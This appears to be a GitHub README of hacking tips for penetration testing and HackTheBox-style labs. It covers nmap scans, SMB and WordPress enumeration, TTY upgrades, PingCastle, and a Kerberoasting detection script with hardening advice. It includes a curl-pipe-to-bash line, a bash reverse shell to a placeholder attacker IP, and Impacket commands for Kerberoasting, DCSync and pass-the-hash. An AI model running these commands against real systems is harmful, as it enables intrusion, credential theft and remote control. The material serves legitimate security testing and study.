jvgassel / Usefull-hacking-tips

Useful tips and places for hacking

Usefull-hacking-tips

Some books you want to read:

Useful tips and tools for hacking

  • Create a file with a range of IP addresses: seq -f "10.10.10.%g" 1 254 > ip.txt
  • Or expand a CIDR range with prips: prips 10.0.0.0/23 > ip.txt (install it first: apt install prips)
  • echo $HISTFILE shows where the shell history file is written (anything typed on the command line, passwords included, ends up there)

Port scan commands

  • nmap -T4 -sV -sT --reason -p1-65535 -vv -oN 'filename' 'IP' (TCP connect scan of all ports with service detection)
  • nmap -sC -sV -oA filename ip (the parameters IppSec typically uses: default scripts, service detection, all output formats)
  • nmap --script vuln 'IP' (runs the NSE scripts in the vuln category)
  • nmap -sV -sC -A -oN filename ip
  • unicornscan -r300 -mU 'IP' for a UDP scan at 300 packets per second; use -mT for TCP

IppSec tips

  • python -m SimpleHTTPServer PORT (Python 2; on Python 3 the equivalent is python3 -m http.server PORT)
  • curl IP:PORT/LinEnum.sh | bash (fetches LinEnum.sh from that web server and pipes it straight into bash)

SMB scan

  • smbclient -N //ip/sharename

Priv Esc

Shell

  • python -c 'import pty; pty.spawn("/bin/sh")'
  • python -c 'import pty; pty.spawn("/bin/bash")'
  • bash -c 'bash -i >& /dev/tcp/YOURIP/PORT 0>&1'
  • When you have a shell, press CTRL-Z to background it, type stty raw -echo, then type fg to bring it back as a usable TTY

WPscan

  • wpscan -u URL -eu -ep -et (enumerate users, plugins and themes; newer WPScan versions use wpscan --url URL -e u,p,t)

IppSec (HackTheBox)

Bloodhound

Screenshot

  • gowitness-2.1.2-windows-amd64.exe scan --cidr 192.168.230.0/24 --threads 10
  • gowitness-2.1.2-windows-amd64.exe file -f ip_in_file.txt --threads 10 (gowitness 2.x reads a list of targets with the file subcommand)
  • gowitness-2.1.2-windows-amd64.exe report serve

Procdump

cpassword

Find string with grep

  • grep -oP '(?<="InsertSearchString": ")[^"]*' (prints only the value following the JSON key "InsertSearchString"; -P enables the Perl lookbehind and -o prints just the match; give a file name or pipe input on stdin)

Run PingCastle from CMD

  • PingCastle.exe --server dc.local --user xxxx --password xxxx --healthcheck
  • PingCastle.exe --server x.x.x.x --export users --user domainuser --password domainpassword
  • Passing --password on the command line leaves it in the command history and makes it visible in the process list while PingCastle runs

Find in Linux

  • find -L . -name "foo*"

Kerberos attacks

  • From a non-domain-joined PC: python GetUserSPNs.py -dc-ip x.x.x.x bla.local/account:password -request
  • From a domain-joined PC: python GetUserSPNs.py bla.local/account:password -request
  • DCSync: python secretsdump.py bla.local/account:password@dc1.bla.local
  • If that works, you can use python wmiexec.py bla.local/account@dc1.bla.local -hashes "insert hash"
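As an added example (not from the original repo), the defender's side of the Kerberoasting request above: detection logic that runs over constructed, simplified key=value renderings of Windows Security event 4769 and flags an account that pulls RC4 (etype 0x17) service tickets for several distinct SPNs in a short window, which is what a GetUserSPNs.py -request run looks like to the domain controller. The log format, field names, accounts and timestamps are assumptions made for the sample.

```python
from collections import defaultdict

# Constructed sample lines, not real logs: a simplified key=value rendering of
# the Windows Security event 4769 (Kerberos service ticket requested) fields
# that matter here. Time is in seconds, just to keep the sample self-contained.
SAMPLE_LOG = """\
EventID=4768 AccountName=alice@BLA.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Time=100
EventID=4769 AccountName=alice@BLA.LOCAL ServiceName=MSSQLSvc/db1 TicketEncryptionType=0x12 Time=105
EventID=4769 AccountName=svc_scan@BLA.LOCAL ServiceName=MSSQLSvc/db1 TicketEncryptionType=0x17 Time=200
EventID=4769 AccountName=svc_scan@BLA.LOCAL ServiceName=HTTP/web1 TicketEncryptionType=0x17 Time=201
EventID=4769 AccountName=svc_scan@BLA.LOCAL ServiceName=CIFS/file1 TicketEncryptionType=0x17 Time=202
EventID=4769 AccountName=svc_scan@BLA.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Time=203
EventID=4769 AccountName=bob@BLA.LOCAL ServiceName=HTTP/web1 TicketEncryptionType=0x17 Time=300
"""

RC4_HMAC = "0x17"  # etype 23; GetUserSPNs.py-style requests ask for RC4 tickets by default


def parse_4769(line):
    """Return (account, service, etype, time) for a 4769 line, else None."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    if fields.get("EventID") != "4769":
        return None
    return (fields["AccountName"], fields["ServiceName"],
            fields["TicketEncryptionType"].lower(), int(fields["Time"]))


def kerberoast_candidates(log_text, window=60, min_spns=3):
    """Flag accounts that obtained RC4 service tickets for >= min_spns distinct
    non-krbtgt SPNs within `window` seconds. Returns {account: [spns]}."""
    per_account = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_4769(line)
        if parsed is None:
            continue
        account, service, etype, ts = parsed
        # a 4769 for krbtgt is a TGT renewal/referral, not a crackable service ticket
        if etype == RC4_HMAC and not service.lower().startswith("krbtgt"):
            per_account[account].append((ts, service))
    flagged = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for t0, _ in reqs:  # sliding window starting at each request
            spns = {s for t, s in reqs if t0 <= t <= t0 + window}
            if len(spns) >= min_spns:
                flagged[account] = sorted(spns)
                break
    return flagged
```

On real data the same logic applies to the 4769 fields of the same names, with the thresholds tuned to the domain. Service accounts restricted to AES encryption types with long random passwords (or gMSAs) both remove the RC4 signal and make any roasted ticket impractical to crack.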

Find installed MSIs (PowerShell)

  • Get-WmiObject Win32_Product | Format-Table IdentifyingNumber, Name
  • msiexec /fa {IdentifyingNumber} repairs the package with that product code
  • Querying Win32_Product makes Windows Installer run a consistency check (and possibly a repair) of every installed package, so it is slow and noisy in the event log

Blacklist IPs when installing Let's Encrypt

License: GNU General Public License v3.0